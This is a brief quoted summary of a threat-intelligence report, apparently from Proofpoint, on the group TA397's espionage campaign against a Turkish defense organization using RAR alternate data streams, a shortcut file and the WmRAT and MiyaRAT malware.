> - Proofpoint observed advanced persistent threat (APT) TA397 targeting a Turkish defense sector organization with a lure about public infrastructure projects in Madagascar.
> - The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads.
> - TA397 was observed manually delivering WmRAT and MiyaRAT malware families in the final stages of this attack chain. Both malware families are designed to enable intelligence gathering and exfiltration.
> - Proofpoint assesses TA397 campaigns are almost certainly intelligence collection efforts in support of a South Asian government’s interests.